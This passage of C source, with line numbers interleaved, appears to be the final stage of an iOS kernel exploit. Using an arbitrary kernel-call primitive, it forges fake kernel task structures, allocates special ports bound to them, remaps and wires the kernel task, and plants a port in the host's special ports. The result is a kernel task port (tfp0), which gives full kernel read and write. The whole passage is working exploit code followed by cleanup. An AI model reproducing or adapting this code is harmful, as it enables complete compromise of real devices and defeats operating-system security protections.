zm_task_buf->a.lock.data = 0x0;
1582
zm_task_buf->a.lock.type = 0x22;
1583
zm_task_buf->a.ref_count = 100;
1584
zm_task_buf->a.active = 1;
1585
zm_task_buf->b.itk_self = 1;
1586
zm_task_buf->a.map = zone_map_addr;
1587
1588
uint32_t km_task_off = 0;
1589
FIND_RANGE(km_task_off, sizeof(ktask_t));
1590
kptr_t km_task_addr = fake_addr + km_task_off;
1591
LOG("km_task addr: " ADDR, km_task_addr);
1592
volatile ktask_t *km_task_buf = (volatile ktask_t*)(shmem_addr + km_task_off);
1593
VOLATILE_BZERO32(km_task_buf, sizeof(ktask_t));
1594
1595
km_task_buf->a.lock.data = 0x0;
1596
km_task_buf->a.lock.type = 0x22;
1597
km_task_buf->a.ref_count = 100;
1598
km_task_buf->a.active = 1;
1599
km_task_buf->b.itk_self = 1;
1600
r = KCALL(OFF(copyout), OFF(kernel_map), &km_task_buf->a.map, sizeof(km_task_buf->a.map), 0, 0, 0, 0);
1601
LOG("kernel_map: " ADDR ", %s", km_task_buf->a.map, errstr(r));
1602
if(r != 0 || !km_task_buf->a.map)
1603
{
1604
goto out;
1605
}
1606
1607
kptr_t ipc_space_kernel = 0;
1608
r = KCALL(OFF(copyout), IOSurfaceRootUserClient_port + ((uintptr_t)&kport.ip_receiver - (uintptr_t)&kport), &ipc_space_kernel, sizeof(ipc_space_kernel), 0, 0, 0, 0);
1609
LOG("ipc_space_kernel: " ADDR ", %s", ipc_space_kernel, errstr(r));
1610
if(r != 0 || !ipc_space_kernel)
1611
{
1612
goto out;
1613
}
1614
1615
#ifdef __LP64__
1616
kmap_hdr_t zm_hdr = { 0 };
1617
r = KCALL(OFF(copyout), zm_task_buf->a.map + off->vm_map_hdr, &zm_hdr, sizeof(zm_hdr), 0, 0, 0, 0);
1618
LOG("zm_range: " ADDR "-" ADDR ", %s", zm_hdr.start, zm_hdr.end, errstr(r));
1619
if(r != 0 || !zm_hdr.start || !zm_hdr.end)
1620
{
1621
goto out;
1622
}
1623
if(zm_hdr.end - zm_hdr.start > 0x100000000)
1624
{
1625
LOG("%s", "zone_map is too big, sorry.");
1626
goto out;
1627
}
1628
kptr_t zm_tmp = 0; // macro scratch space
1629
# define ZM_FIX_ADDR(addr) \
1630
( \
1631
zm_tmp = (zm_hdr.start & 0xffffffff00000000) | ((addr) & 0xffffffff), \
1632
zm_tmp < zm_hdr.start ? zm_tmp + 0x100000000 : zm_tmp \
1633
)
1634
#else
1635
# define ZM_FIX_ADDR(addr) (addr)
1636
#endif
1637
1638
kptr_t ptrs[2] = { 0 };
1639
ptrs[0] = ZM_FIX_ADDR(KCALL(OFF(ipc_port_alloc_special), ipc_space_kernel, 0, 0, 0, 0, 0, 0));
1640
ptrs[1] = ZM_FIX_ADDR(KCALL(OFF(ipc_port_alloc_special), ipc_space_kernel, 0, 0, 0, 0, 0, 0));
1641
LOG("zm_port addr: " ADDR, ptrs[0]);
1642
LOG("km_port addr: " ADDR, ptrs[1]);
1643
1644
KCALL(OFF(ipc_kobject_set), ptrs[0], zm_task_addr, IKOT_TASK, 0, 0, 0, 0);
1645
KCALL(OFF(ipc_kobject_set), ptrs[1], km_task_addr, IKOT_TASK, 0, 0, 0, 0);
1646
1647
r = KCALL(OFF(copyin), ptrs, self_task + off->task_itk_registered, sizeof(ptrs), 0, 0, 0, 0);
1648
LOG("copyin: %s", errstr(r));
1649
if(r != 0)
1650
{
1651
goto out;
1652
}
1653
mach_msg_type_number_t mapsNum = 0;
1654
ret = mach_ports_lookup(self, &maps, &mapsNum);
1655
LOG("mach_ports_lookup: %s", mach_error_string(ret));
1656
if(ret != KERN_SUCCESS)
1657
{
1658
goto out;
1659
}
1660
LOG("zone_map port: %x", maps[0]);
1661
LOG("kernel_map port: %x", maps[1]);
1662
if(!MACH_PORT_VALID(maps[0]) || !MACH_PORT_VALID(maps[1]))
1663
{
1664
goto out;
1665
}
1666
// Clean out the pointers without dropping refs
1667
ptrs[0] = ptrs[1] = 0;
1668
r = KCALL(OFF(copyin), ptrs, self_task + off->task_itk_registered, sizeof(ptrs), 0, 0, 0, 0);
1669
LOG("copyin: %s", errstr(r));
1670
if(r != 0)
1671
{
1672
goto out;
1673
}
1674
1675
mach_vm_address_t remap_addr = 0;
1676
ret = mach_vm_remap(maps[1], &remap_addr, off->sizeof_task, 0, VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR, maps[0], kernel_task_addr, false, &cur, &max, VM_INHERIT_NONE);
1677
LOG("mach_vm_remap: %s", mach_error_string(ret));
1678
if(ret != KERN_SUCCESS)
1679
{
1680
goto out;
1681
}
1682
LOG("remap_addr: 0x%016llx", remap_addr);
1683
1684
ret = mach_vm_wire(realhost, maps[1], remap_addr, off->sizeof_task, VM_PROT_READ | VM_PROT_WRITE);
1685
LOG("mach_vm_wire: %s", mach_error_string(ret));
1686
if(ret != KERN_SUCCESS)
1687
{
1688
goto out;
1689
}
1690
1691
kptr_t newport = ZM_FIX_ADDR(KCALL(OFF(ipc_port_alloc_special), ipc_space_kernel, 0, 0, 0, 0, 0, 0));
1692
LOG("newport: " ADDR, newport);
1693
KCALL(OFF(ipc_kobject_set), newport, remap_addr, IKOT_TASK, 0, 0, 0, 0);
1694
KCALL(OFF(ipc_port_make_send), newport, 0, 0, 0, 0, 0, 0);
1695
r = KCALL(OFF(copyin), &newport, OFF(realhost) + off->realhost_special + sizeof(kptr_t) * 4, sizeof(kptr_t), 0, 0, 0, 0);
1696
LOG("copyin: %s", errstr(r));
1697
if(r != 0)
1698
{
1699
goto out;
1700
}
1701
1702
task_t kernel_task = MACH_PORT_NULL;
1703
ret = host_get_special_port(realhost, HOST_LOCAL_NODE, 4, &kernel_task);
1704
LOG("kernel_task: %x, %s", kernel_task, mach_error_string(ret));
1705
if(ret != KERN_SUCCESS || !MACH_PORT_VALID(kernel_task))
1706
{
1707
goto out;
1708
}
1709
1710
*tfp0 = kernel_task;
1711
*kernelbase = kbase;
1712
retval = KERN_SUCCESS;
1713
1714
out:;
1715
LOG("%s", "Cleaning up...");
1716
usleep(100000); // Allow logs to propagate
1717
if(maps)
1718
{
1719
RELEASE_PORT(maps[0]);
1720
RELEASE_PORT(maps[1]);
1721
}
1722
RELEASE_PORT(fakeport);
1723
for(size_t i = 0; i < NUM_AFTER; ++i)
1724
{
1725
RELEASE_PORT(after[i]);
1726
}
1727
RELEASE_PORT(port);
1728
for(size_t i = 0; i < NUM_BEFORE; ++i)
1729
{
1730
RELEASE_PORT(before[i]);
1731
}
1732
RELEASE_PORT(realport);
1733
RELEASE_PORT(stuffport);
1734
RELEASE_PORT(client);
1735
my_mach_zone_force_gc(host);
1736
if(shmem_addr != 0)
1737
{
1738
_kernelrpc_mach_vm_deallocate_trap(self, shmem_addr, shmemsz);
1739
shmem_addr = 0;
1740
}
1741
if(dict_prep)
1742
{
1743
free(dict_prep);
1744
}
1745
if(dict_big)
1746
{
1747
free(dict_big);
1748
}
1749
if(dict_small)
1750
{
1751
free(dict_small);
1752
}
1753
if(resp)
1754
{
1755
free(resp);
1756
}
1757
1758
// Pass through error code, if existent
1759
if(retval != KERN_SUCCESS && ret != KERN_SUCCESS)
1760
{
1761
retval = ret;
1762
}
1763
return retval;
1764
}
1765
1766